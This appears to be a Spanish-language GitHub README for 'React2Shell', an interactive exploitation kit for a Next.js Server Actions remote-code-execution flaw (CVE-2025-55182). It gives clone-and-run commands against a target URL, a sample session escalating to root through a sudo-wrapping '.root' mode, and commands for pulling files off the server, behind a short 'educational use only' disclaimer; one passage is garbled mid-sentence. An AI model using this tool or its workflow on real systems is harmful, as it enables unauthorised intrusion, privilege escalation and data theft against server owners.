
Kit de explotación avanzado para Next.js Server Actions (CVE-2025-55182)
Kit de explotación avanzado para Server Actions de Next.js (CVE-2025-55182).
React2Shell es un potente envoltorio de shell interactivo diseñado para explotar la vulnerabilidad React2Shell. Va más allá de un simple RCE al proporcionar historial de comandos, capacidades de transferencia de archivos y estrategias automatizadas de escalada de privilegios.
base64 | sudo -i) para evitar las restricciones del shell y escalar a root al instante..download <remote> [local]: Descarga de archivos fiable y segura para datos binarios mediante codificación base64..save: Guarda la salida del comando en archivos de evidencia locales.
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests
python3 react2shell.py -u https://target-nextjs-site.com/
Ejecutar con detección de estrategia de persistencia de root verificada:
python3 react2shell.py -u https://target.com/
Una vez dentro del shell:
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Root mode ENABLED
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)
SOLO CON FINES EDUCATIVOS. Esta herramienta está destinada únicamente a la investigación de seguridad y pruebas autorizadas. Los autores no se hacen responsables de cualquier uso indebido o daño causado por esta herramienta. No escanees ni explotes objetivos para los que no tengas permiso explícito de prueba.
Desarrollado para pruebas de penetración éticas y operaciones de red team.
| Comando | Descripción |
|---|
.root | Activa el Modo Root (envuelve los comandos en sudo -i) |
.download <file> | Descarga un archivo del servidor remoto |
.save | Guarda la salida del último comando en un archivo |
.exit | Salir del shell |